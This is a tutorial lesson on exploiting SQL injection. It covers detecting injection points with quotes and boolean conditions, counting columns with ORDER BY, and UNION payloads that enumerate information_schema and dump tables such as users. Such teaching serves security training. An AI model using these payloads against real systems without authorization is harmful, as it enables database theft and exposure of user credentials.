Hands-On SQL Injection Techniques

With a solid understanding of why SQL injection occurs, it's time to explore practical exploitation techniques. This lesson covers the core methods you'll use to discover and exploit SQL injection vulnerabilities in real applications.

Detecting Injection Points

Before you can exploit SQL injection, you need to find it. Every place where user input reaches the database is potentially vulnerable. Login forms, search boxes, URL parameters, cookies, and HTTP headers all deserve testing.

The classic detection method involves inserting a single quote into input fields. If the application returns a database error, you've likely found an injection point. An error message mentioning SQL syntax, MySQL, PostgreSQL, or similar database terms confirms that your input reached the database layer.

However, many modern applications hide database errors behind generic messages. In these cases, you can use Boolean-based detection. Try inputs like ' AND '1'='1 and ' AND '1'='2. If the application behaves differently for these two inputs, even subtly, SQL injection is likely present. The first condition is true and should return normal results, while the second is false and should change the response.

UNION-Based Data Extraction

Once you've confirmed an injection point, UNION attacks provide a powerful method for extracting data from the database. The UNION operator in SQL combines the results of multiple SELECT queries, and attackers use this to append their own queries to legitimate ones.

The first challenge is determining how many columns the original query returns, since UNION requires matching column counts. Use ORDER BY clauses with increasing numbers until you get an error. If ORDER BY 5 works but ORDER BY 6 fails, the query returns 5 columns.

With the column count known, you can construct a UNION injection. Start with a payload like ' UNION SELECT NULL,NULL,NULL,NULL,NULL-- using the appropriate number of NULLs. If this returns without error, you've successfully appended your own query.

Next, determine which columns display output on the page. Replace NULL values one at a time with recognizable strings like 'test1'. When a test string appears in the response, you've found a column suitable for extracting data.

Enumerating the Database

With working UNION injection, you can explore the entire database. Different database systems provide different methods for enumeration. In MySQL, the information_schema database contains metadata about all tables and columns. Query information_schema.tables to list tables, then information_schema.columns to discover column names.

Build your payload incrementally. Start by extracting database version and user information to understand what you're working with. Then enumerate table names, identify interesting tables like "users" or "credentials," and extract their column structures. Finally, dump the actual data from these columns.

Each extraction requires a carefully crafted UNION query. ' UNION SELECT table_name,NULL,NULL FROM information_schema.tables-- might reveal all table names. Once you find a target table, ' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'-- reveals its structure.

The process is methodical: detect, enumerate, and extract. With patience and careful query construction, you can map and dump entire databases through a single injection point.